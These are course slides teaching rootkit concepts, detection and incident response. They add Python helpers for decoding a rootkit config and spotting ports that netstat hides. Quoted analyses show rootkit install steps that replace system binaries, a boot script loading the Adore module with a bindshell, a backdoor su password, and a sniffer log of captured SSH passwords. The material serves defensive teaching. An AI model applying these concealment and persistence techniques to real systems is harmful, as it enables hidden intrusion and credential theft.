Module 2: Rootkits & Post-Intrusion Concealment
Highline Community College, Seattle University, University of Washington, in conjunction with the National Science Foundation

Objectives
• What are rootkits?
• How do attackers use them?
• How do you defend against them?
• How can you identify them?
Rootkits Defined
A set of tools used by an attacker to conceal their presence and maintain control of the operating system without the administrator being aware.

Concealment using "Rootkits"
• Replacement of operating system commands or system calls
• Two fundamental types:
  • Application (user) level
  • Kernel level
• Configuration file(s) to control hiding
• Often simple to identify/bypass, but can be very difficult to detect/disable
• http://staff.washington.edu/dittrich/misc/faqs/rootkits.faq
Application Level Rootkits
• The original rootkits developed for UNIX systems
• Many rootkit components are simply "Trojan horses"
• Hackers modify common commands such as ls, ps and netstat so that they perform other things in addition to their intended function
• Special program to hide application windows (Windows)

Kernel Level Rootkits
• Loadable Kernel Modules (LKMs)
  • Loadable kernel modules are used by UNIX flavors (e.g., Linux, FreeBSD and Solaris) to interface with hardware and other data
• Kernel-level hooks to system calls (e.g., function call table modification)
• No replacement of operating system external command programs
• Programs hidden from Task Manager and Explorer (Windows)
• Can fool "Tripwire"-style integrity checks
• Much harder to detect

Longevity of Rootkits
• Memory-based rootkits exist only in RAM and disappear after a reboot
  • No visible footprint in the file system
  • Requires live system analysis (may be very difficult to detect)
• Persistent rootkits stay alive even after a reboot
  • Require modifying startup files (Unix), the Startup folder (Windows) or Registry keys (Windows)
  • Easier to find, but may require static (dead) analysis of the file system
Rootkit Example
• Scan of the Month #15 (2001)
• http://project.honeynet.org/scans/scan15/som/som6.txt

Following is a step-by-step description of the installation process, as determined by the 'last/install' file:
a) it instructs the shell to stop logging the script's commands.
b) it checks to see if certain files are on the system (make, gcc, sshd). The positive or negative results do not affect the installation.
c) it completely replaces:
  * /sbin/ifconfig
  * /bin/netstat
  …

Rootkit Example (cont)
c) it completely replaces:
  …
  * /bin/ps
  * /usr/bin/top
with its own binaries. Please note that these are precompiled binaries, which means that the time and footprint to install is significantly reduced compared to a kit which compiles sources.
d) it creates two files, with the following purpose:
  * /dev/rpm - which lists process names to exclude from ps and top.
  * /dev/last - which lists subnets and ports to exclude from netstat.
These are similar to a rootkit described here: http://www.sans.org/y2k/013101-1000.htm
Rootkit Example (obfuscated)
• Scan of the Month #16 (2001)
• Contents of unknown file:
0000000: a499 9693 9aa2 f599 9691 9bc2 d09b 9a89 ......õ....ÂÐ...
0000010: d08f 8b8c d0cf ced0 9d96 91d0 9996 919b Ð...ÐÏÎÐ...Ð....
0000020: f59b 8ac2 d09b 9a89 d08f 8b8c d0cf ced0 õ..ÂÐ...Ð...ÐÏÎÐ
0000030: 9d96 91d0 9b8a f593 8cc2 d09b 9a89 d08f ...Ð..õ..ÂÐ...Ð.
0000040: 8b8c d0cf ced0 9d96 91d0 938c f599 9693 ..ÐÏÎÐ...Ð..õ...
0000050: 9aa0 9996 938b 9a8d 8cc2 cfce d393 9d93 .........ÂÏÎÓ...
0000060: 969d 8f8c d18c 90d3 8c91 d193 d38f 8d90 ....Ñ..Ó..Ñ.Ó...
0000070: 92d3 9c93 9a9e 919a 8dd3 9b90 8cd3 8a9c .Ó.......Ó...Ó..
0000080: 9091 99d1 9691 89d3 8f8c 9d91 9cd3 938f ...Ñ...Ó.....Ó..
0000090: 9e9c 9c8b d3aa acba adf5 f5a4 8f8c a2f5 ....Óª.º.õõ....õ
00000a0: 8f8c c2d0 9b9a 89d0 8f8b 8cd0 cfce d09d ..ÂÐ...Ð...ÐÏÎÐ.
00000b0: 9691 d08f 8c8d f58f 8ca0 9996 938b 9a8d ..Ð...õ.........
00000c0: 8cc2 938f 8ed3 938f 8c9c 979a 9bd3 8c97 .Â...Ó.......Ó..
00000d0: ce8b d38f 8c8d d38c 8c97 9bcd d393 8f8c Î.Ó...Ó....ÍÓ...
00000e0: 9a8b d393 8f9e 9c9c 8bd3 9d91 9c93 8fd3 ..Ó......Ó.....Ó
00000f0: 938f 8c86 8cf5 938c 9099 a099 9693 8b9a .....õ..........
0000100: 8d8c c293 8fd3 8a9c 9091 99d1 9691 89d3 ..Â..Ó.....Ñ...Ó
. . .
Rootkit Example (de-obfuscated)
• Scan of the Month #16 (2001)
• http://project.honeynet.org/scans/scan16/som/som30.txt
[file]
find=/usr/man/man1/xxxxxxbin/find
du=/usr/man/man1/xxxxxxbin/du
ls=/usr/local/bin/ls.gnu
file_filters=xxxxxx,yyyyyy,aaaaaa,mmmmmmmmm
[ps]
ps=/usr/man/man1/xxxxxxbin/ps
ps_filters=nedit,bash
. . .

Rootkit Example (de-obfuscated) (cont)
. . .
[netstat]
netstat=/usr/man/man1/xxxxxxbin/netstat
net_filters=innu.org
[login]
su_pass=h4x0r
su_loc=/usr/man/man1/xxxxxxbin/su
ping=/usr/man/man1/xxxxxxbin/ping
passwd=/usr/man/man1/xxxxxxbin/passwd
shell=/usr/man/man1/xxxxxxbin/bash
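The dump on the "obfuscated" slide is a single-byte XOR with 0xFF (checkable from its first byte: 0xa4 ^ 0xff is '['), and the plaintext has the same [section] / key=value layout the de-obfuscated slides show. The following Python is an added example, not code from the slides or the Honeynet write-up: it rebuilds the bytes from the first ten lines of that xxd dump, decodes them, and parses the sections so a responder can list the replacement binaries and the names each trojaned tool hides; the xxd parsing and the 0xFF key are my assumptions, verified only against that dump.

```python
import re
# Constructed sample: offset + hex columns of the first ten lines of the xxd
# dump on the "Rootkit Example (obfuscated)" slide (ASCII column dropped).
HEXDUMP = """\
0000000: a499 9693 9aa2 f599 9691 9bc2 d09b 9a89
0000010: d08f 8b8c d0cf ced0 9d96 91d0 9996 919b
0000020: f59b 8ac2 d09b 9a89 d08f 8b8c d0cf ced0
0000030: 9d96 91d0 9b8a f593 8cc2 d09b 9a89 d08f
0000040: 8b8c d0cf ced0 9d96 91d0 938c f599 9693
0000050: 9aa0 9996 938b 9a8d 8cc2 cfce d393 9d93
0000060: 969d 8f8c d18c 90d3 8c91 d193 d38f 8d90
0000070: 92d3 9c93 9a9e 919a 8dd3 9b90 8cd3 8a9c
0000080: 9091 99d1 9691 89d3 8f8c 9d91 9cd3 938f
0000090: 9e9c 9c8b d3aa acba adf5 f5a4 8f8c a2f5
"""
HEX_GROUP = re.compile(r"[0-9a-fA-F]{2,4}")

def hexdump_to_bytes(dump: str) -> bytes:
    """Rebuild raw bytes from xxd-style lines: skip the offset token, then read
    hex groups until the first token that is not one (the ASCII column)."""
    raw = bytearray()
    for line in dump.splitlines():
        for tok in line.split()[1:]:
            if not HEX_GROUP.fullmatch(tok):
                break
            raw += bytes.fromhex(tok)
    return bytes(raw)

def xor_decode(data: bytes, key: int = 0xFF) -> str:
    """Single-byte XOR; 0xFF is the key this dump uses (0xa4 ^ 0xff == ord('['))."""
    return bytes(b ^ key for b in data).decode("latin-1")

def parse_config(text: str) -> dict:
    """Parse the INI-like config into {section: {key: value}}; lines outside a
    section or without '=' are ignored."""
    cfg, section = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            cfg.setdefault(section, {})
        elif "=" in line and section is not None:
            key, value = line.split("=", 1)
            cfg[section][key.strip()] = value.strip()
    return cfg

def hidden_names(cfg: dict) -> dict:
    """Names each trojaned tool is told to hide, keyed by its *_filters entry."""
    return {k: v.split(",") for sec in cfg.values()
            for k, v in sec.items() if k.endswith("_filters")}
```

Running `parse_config(xor_decode(hexdump_to_bytes(HEXDUMP)))` on the ten sample lines yields the complete [file] section and the start of [ps]; the replacement-binary paths it recovers are the locations a responder should image and hash.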
Concealment using LKMs
• Example: "Omerta" in "The Hacker's Challenge"
  http://www.osborne.com/pressroom/0072193840_press.shtml
• Example: SucKIT
• Advances in Kernel Hacking
  http://www.phrack.org/phrack/58/p58-0x06
• Linux on-the-fly kernel patching without LKM
  http://www.phrack.org/phrack/58/p58-0x07
• Linux x86 kernel function hooking emulation
  http://www.phrack.org/phrack/58/p58-0x08
LKM Example: Adore
• Excerpt from "Omerta" analysis
-----------------------------------------------------------------------------
# diff rc.local /etc/rc.d/rc.local
36d35
< /usr/sbin/initd
-----------------------------------------------------------------------------
The file "initd" is the method used to load the kernel module, and to start the bindshell process, on each boot:
-----------------------------------------------------------------------------
#!/bin/sh
# automatic install script to load kernel modules for ipv6 support.
# do not edit the file directly.
/sbin/insmod -f /lib/modules/2.2.16-3/net/ipv6.o >/dev/null 2>/dev/null
/usr/sbin/rpc.status
-----------------------------------------------------------------------------
. . .

LKM Example: Adore (cont)
• Excerpt from "Omerta" analysis
. . .
-----------------------------------------------------------------------------
The file "rpc.status" contains strings that indicate it is a remote access shell of some sort:
-----------------------------------------------------------------------------
. . .
leeto bindshell.
Enter valid IPX address:
gdb
(nfsiod)
socket
bind
listen
accept
/bin/sh
/dev/null
. . .
-----------------------------------------------------------------------------
Example: SucKIT
• From the README
SucKIT v1.3a, (c) 2002 by sd <sd@cdi.cz> & devik <devik@cdi.cz>
+-------------------------------------------------------------+
Code: by sd, with a lot of help from devik <devik@cdi.cz>
Concepts: by Silvio Cesare - /dev/kmem, devik - kmalloc & IDT
  http://phrack.org/p58/phrack-09
Tested: by hundreds of script kiddos around the globe :)
Targets: i386-Linux boxen, kernels 2.2.x, 2.4.x without security patches/modules.
Downloads: http://sd.g-art.nl/sk
. . .

Example: SucKIT (cont)
• From the README
. . .
The SucKIT is an easy-to-use, Linux-i386 kernel-based rootkit. The code stays in memory through the /dev/kmem trick, without help of LKM support nor System.map or such things. Everything is done on the fly. It can hide PIDs, files, tcp/udp/raw sockets, sniff TTYs. Next, it has integrated TTY shell access (xor+sha1) which can be invoked through any running service on a server. No compiling on target box needed, one binary can work on any of 2.2.x & 2.4.x kernels precompiled (libc-free).
Example: SucKIT sniffer log
• .sniffer output
root@moon's password: fr8!rain
ssh adonis :
root@adonis's password: f93Dk;-w
ssh -l victim bashful :
The authenticity of host 'bashful (192.168.0.89)' can't be established.
DSA key fingerprint is c5:92:c5:4f:3b:51:8b:51:3a:0c:6d:aa:d5:56:8c:fe.
Are you sure you want to continue connecting (yes/no)?
Warning: Permanently added 'bashful,192.168.0.89' (DSA) to the list of known hosts.
victim@bashful's password: t8erTots
. . .

Example: SucKIT sniffer (cont)
. . .
ssh -l victim ida :
The authenticity of host 'ida (192.168.0.56)' can't be established.
DSA key fingerprint is 17:da:11:28:ea:43:a4:a6:ed:84:4f:43:b5:a2:43:1f.
Are you sure you want to continue connecting (yes/no)?
Warning: Permanently added 'ida,192.168.0.56' (DSA) to the list of known hosts.
victim@ida's password: t8erTots
ssh metate :
root@metate's password: fr8!rain
ssh adonis :
root@adonis's password: f93Dk;-w
ssh incubus :
ssh_exchange_identification: Connection closed by remote host
ssh adonis :
root@adonis's password: f93Dk;-w
Something is Wrong
• Something doesn't "feel or look" right to the sysadmin
• Compare the internal view vs. the external view
  • netstat/lsof (Unix) or FPort (Windows) vs. Nmap
• Trust very little without proof and second sources of information (best is external to the suspect system)
• On initial installation, get the MD5/SHA1 hash value of each file
  • Compare later
  • Or get from a hash index site

How to Detect
• Keep a close eye on your system (e.g., file fingerprinting, centralized system logging)
• Notice unusual traffic with IDS, etc.
• Notice unusual ports being used (this could also be botnet activity)
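The "internal view vs. external view" check above is mechanical enough to script. This is an added Python example, not part of the slides: it takes constructed `netstat -an` output from the suspect host and constructed `nmap` normal output taken from a second, trusted machine, and reports every port that is open from outside but missing from the host's own listening list, which is exactly the discrepancy a netstat-filtering rootkit produces. The sample outputs are invented for the example; the column layouts assumed are those of Linux netstat and nmap's default report.

```python
import re
# Constructed sample (not a real capture): what the suspect host reports about
# itself with `netstat -an` ...
NETSTAT_INTERNAL = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN
tcp        0      0 192.168.0.89:22         192.168.0.5:51234       ESTABLISHED
udp        0      0 0.0.0.0:123             0.0.0.0:*
"""
# ... and what a scan from a second, trusted machine sees (nmap normal output).
NMAP_EXTERNAL = """\
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
31337/tcp open  unknown
123/udp   open  ntp
"""
NMAP_OPEN = re.compile(r"^(\d+)/(tcp|udp)\s+open\b", re.M)

def internal_listeners(netstat_text: str) -> set:
    """(proto, port) pairs the host admits are listening. UDP rows carry no
    state column, so every udp row counts; tcp rows must say LISTEN."""
    found = set()
    for line in netstat_text.splitlines():
        cols = line.split()
        if len(cols) < 4 or cols[0] not in ("tcp", "udp", "tcp6", "udp6"):
            continue
        proto = cols[0][:3]
        port = int(cols[3].rsplit(":", 1)[1])   # handles 0.0.0.0:22 and :::22
        if proto == "udp" or (len(cols) > 5 and cols[5] == "LISTEN"):
            found.add((proto, port))
    return found

def external_open(nmap_text: str) -> set:
    """(proto, port) pairs the external scanner reports as open."""
    return {(m.group(2), int(m.group(1))) for m in NMAP_OPEN.finditer(nmap_text)}

def unexplained_ports(netstat_text: str, nmap_text: str) -> set:
    """Open from outside but absent from the host's own view: either netstat's
    output is being filtered or something else answers for the host. Either
    way the port needs an explanation before the host is trusted."""
    return external_open(nmap_text) - internal_listeners(netstat_text)
```

Ports that are listening internally but invisible externally (127.0.0.1:25 here) are not flagged, since a loopback-only or host-firewalled listener is the expected case, not the suspicious one.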
UNIX tools
• http://www.chkrootkit.org
• chkrootkit
  • chkrootkit: shell script that checks system binaries for rootkit modification.
  • ifpromisc.c: checks if the interface is in promiscuous mode.
  • chklastlog.c: checks for lastlog deletions.
  • chkwtmp.c: checks for wtmp deletions.
  • check_wtmpx.c: checks for wtmpx deletions. (Solaris only)
  • chkproc.c: checks for signs of LKM trojans.
  • chkdirs.c: checks for signs of LKM trojans.
  • strings.c: quick and dirty strings replacement.
  • chkutmp.c: checks for utmp deletions.

UNIX tools (cont'd)
• http://www.rootkit.nl/projects/rootkit_hunter.html
• rkhunter (from their site)
Rootkit Hunter is a scanning tool to assure you (to about 99.9%*) you're clean of nasty tools. This tool scans for rootkits, backdoors and local exploits by running tests like:
  - MD5 hash compare
  - Look for default files used by rootkits
  - Wrong file permissions for binaries
  - Look for suspected strings in LKM and KLD modules
  - Look for hidden files
  - Optional scan within plaintext and binary files
Rootkit Hunter is released as a GPL licensed project and is free for everyone to use.
* No, not really 99.9%... It's just another security layer.
Windows Tools
• http://www.sysinternals.com/ntw2k/freeware/rootkitreveal.shtml
• RootkitRevealer
• Interesting quote from the site:
  The reason that there is no longer a command-line version is that malware authors have started targeting RootkitRevealer's scan by using its executable name. We've therefore updated RootkitRevealer to execute its scan from a randomly named copy of itself that runs as a Windows service. This type of execution is not conducive to a command-line interface. Note that you can use command-line options to execute an automatic scan with results logged to a file, which is the equivalent of the command-line version's behavior.

Windows Tools (cont'd)
• http://greatis.com/unhackme/
• UnHackMe
• Windows NT4/2000/XP through SP2
• What's new in version 2.5
  • Added detection of AFX Rootkit 2005, Elite Keylogger, hidden processes.
• What's new in version 2.0
  • Added detection and removal of AFX Rootkit and Vanquish Rootkit.
  • UnHackMe monitor.
• Not GPL

Windows Tools (cont'd)
• http://www.iarsn.com/taskinfo.html
• TaskInfo
• Used to look for rogue processes
• Works on Windows 95 through 2003 Server
• TaskInfo shows information about all running processes and threads, including ring0 VxD threads. Information about each process includes:
  • Most of the processes that want to be invisible, like worms, keyloggers and other spy software
  • All threads (with details including Thread Start Address and Call Stack with Symbolic Information if possible)
  • CPU usage (multiple CPUs supported)
  • Memory usage
  • Scheduling rate
  • Path
  • Opened files and handles
  • Loaded modules (DLLs etc.)
  • Command line
  • Environment variables
  • Version information
  • Connections
What to Do Next
• Most companies and organizations want to clean up the mess and get back to work ("wipe and reinstall")
• What if it's on more than one machine?
• What if the attacker has other back doors?
• What about sniffed passwords, or logged keystrokes?
• How did they get in to begin with?

Steps to Take
• Isolate the system from the network
• Image the drive(s) if possible
• Determine which rootkit was used
• Go online for information on how to clean up the drive

Resources
• http://staff.washington.edu/dittrich/misc/faqs/rootkits.faq
• http://en.wikipedia.org/wiki/Root_kit
• http://www.sysinternals.com/ntw2k/freeware/rootkitreveal.shtml
• http://www.rootkit.com
• http://research.microsoft.com/rootkit/